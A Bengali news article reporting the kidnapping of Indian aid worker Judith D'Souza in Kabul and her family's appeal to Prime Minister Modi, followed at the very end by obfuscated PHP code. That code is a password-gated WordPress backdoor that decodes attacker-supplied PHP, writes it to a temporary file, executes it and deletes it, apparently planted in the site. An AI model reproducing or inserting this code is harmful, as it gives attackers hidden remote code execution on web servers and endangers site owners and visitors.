মঙ্গলবার, ১৮ই জুন, ২০২৪ খ্রিস্টাব্দ ৪ঠা আষাঢ়, ১৪৩১ বঙ্গাব্দ

কাবুলে অপহৃত ভারতীয়কে উদ্ধারে মোদির সহায়তা কামনা

 

আন্তর্জাতিক ডেস্ক :আফগানিস্তানের রাজধানী থেকে অপহৃত ভারতীয় নারী জুডিথ ডিসুজাকে উদ্ধারে প্রধানমন্ত্রী নরেন্দ্র মোদির সহায়তা চেয়েছে তাঁর পরিবার। কাবুলে কর্মরত জুডিথকে বৃহস্পতিবার রাতে অপহরণ করা হয়। প্রধানমন্ত্রী মোদির আফগানিস্তান সফরের মাত্র ৫ দিন পর অপহৃত হলেন এই ভারতীয় নারী।

image-2783

 

শনিবার বিকেলে জুডিথের ভাই জেরম টুইট করেন প্রধানমন্ত্রীর কার্যালয়ে। তিনি বলেন, ‘৪৮ ঘণ্টা কেটে গেছে। এখনও জুডিথের খোঁজ নেই। তাকে খুঁজে বের করতে আমরা আপনার হস্তক্ষেপ চাইছি।’জেরম অপহরণের ঘটনায় শোকে ভেঙে পড়েছেন তার মা-বাবা। এ সম্পর্কে তার ভাই বলেন, ‘তারা এখন কারও সঙ্গে কথাই বলতে চাইছেন না। জুডিথ যেন সুস্থ শরীরে বাড়ি ফিরে আসে এজন্য মা কেবল ঈশ্বরের কাছে প্রার্থনা করছেন।’ তিনি জানান, ‘বাড়িতে আসছেন উদ্বিগ্ন পরিজনেরা। কিন্তু যাঁর জন্য এই উদ্বেগ, তাঁর তো খবর নেই।’

 

 

কোলকাতায় নিজেদের বাড়ি থেকে জেরম আরো জানান, পররাষ্ট্র মন্ত্রণালয় থেকে এখনও জুডিথের কোনও খবর মেলেনি। মুক্তিপণ চেয়েও কোনও ফোন পায়নি জুডিথের পরিবার। জুডিথের মুক্তির বিষয়ে তারা মন্ত্রণালয়ের সঙ্গে নিয়মিত যোগাযোগ রাখছেন।এদিকে পররাষ্ট্রমন্ত্রী সুষমা স্বরাজ শুক্রবার কোলকাতায় জুডিথের পরিবারের সঙ্গে যোগাযোগ করেছেন। তিনি তাদের আশ্বাস দিয়ে বলেছেন, জুডিথকে ফিরিয়ে আনতে তারা সবরকমের প্রচেষ্টা চালাচ্ছেন।

 

 

জুডিথ আফগানিস্তানের আগা খান ফাউন্ডেশনের উর্ধ্বতন প্রযুক্তি উপদেষ্টা হিসেবে কাজ করতেন। বৃহস্পতিবার রাতে কাবুলের তৈমানি এলাকায় নিজের অফিসের বাইরে থেকে তাকে অপহরণ করা হয়। এখনও পর্যন্ত কোনো গোষ্ঠী এই অপহরণের দায় স্বীকার করেনি। তবে ধারণা করা হচ্ছে সেখানকার সন্ত্রাসী গোষ্ঠীর হাতে তিনি অপহৃত হয়েছেন। আগামী সপ্তাহে তার ভারত ফেরার কথা ছিল।

 

 

এদিকে জুডিথের জন্য ক্রমশ উদ্বেগ বাড়ছে কোলকাতার সাধারণ মানুষজনের মধ্যেও। তার অপহরণের প্রতিবাদ এবং সুস্থ শরীরে দেশে ফিরে আসার কামনা করে শনিবার সন্ধ্যায় পার্ক স্ট্রিটের অ্যালেন পার্কে মোমবাতি মিছিলের আয়োজন করেছিল ডিসুজা পরিবার। তাদের সঙ্গে অনেক সাধারণ মানুষও যোগ দিয়েছিল এ মিছিলে।

প্রসঙ্গত এ ঘটনার মাত্র পাঁচদিন আগে পাঁচ দেশ সফরের শুরুতে গত ৪ জুন (শনিবার) কাবুল সফর করেছিলেন ভারতের প্রধানমন্ত্রী নরেন্দ্র মোদি। সফরকালে তিনি আফগান প্রেসিডেন্ট আশরাফ গনির সঙ্গে যৌথভাবে ২৯ কোটি মার্কিন ডলার ব্যয়ে নির্মিত একটি জলবিদ্যুৎ বাঁধ উদ্বোধন করেছিলেন। এ ঘটনার মাত্র পাঁচদিন পর অপহৃত হন জুডিথ।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}